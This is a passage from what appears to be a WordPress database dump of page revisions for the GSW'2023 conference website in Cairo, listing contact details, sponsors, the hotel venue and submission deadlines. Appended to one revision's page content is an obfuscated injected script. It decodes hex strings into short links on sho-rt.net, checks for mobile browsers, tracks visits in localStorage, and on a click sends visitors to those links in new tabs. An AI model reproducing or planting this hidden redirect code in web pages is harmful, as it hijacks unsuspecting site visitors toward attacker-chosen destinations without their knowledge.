Semiramis</strong></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-05-17 04:51:30','2023-05-17 04:51:30','',3066,'https://gsw2023.com/?p=4517',0,'revision','',0),
(4518,1,'2023-05-17 04:56:21','2023-05-17 04:56:21','[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201412150{margin-top: 100px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]\r\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]\r\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\r\n<span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684272005765{margin-top: -25px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"300\" height=\"124\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\r\n<a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\r\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\r\n[/vc_column_text][/vc_column_inner]\r\n\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\" css=\".vc_custom_1684297727133{margin-top: 25px !important;}\"][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3287|url^https://gsw2023.com/wp-content/uploads/2022/11/intercontinental-cairo-7836282477-2x1-1.jpg|caption^null|alt^null|title^intercontinental-cairo-7836282477-2x1|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\"][vc_column][ultimate_heading main_heading=\"BOOK YOUR HOTEL NOW\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\" margin_design_tab_text=\"\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #000080;\"><strong><a style=\"color: #000080;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Conference Venue </a></strong></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000080; font-size: 24pt;\"><strong>(InterContinental Cairo Semiramis)</strong></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #000080;\"><strong><a style=\"color: #000080;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Special Rate Booking is Opened Now</a></strong></span></h4>\r\n[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684297351791{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"]\r\n<h3>[vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner]</h3>\r\n<h3>[vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</h3>\r\n<h3></h3>\r\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\r\n[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):            .</strong>\r\n\r\n<strong><del>April 15, 2023</del> ,</strong>\r\n\r\n<strong> May 15, 2023  (hard deadline, no extension)</strong>\r\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification:</strong>\r\n\r\n<strong><del>May 15, 2023</del>, May 21, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner 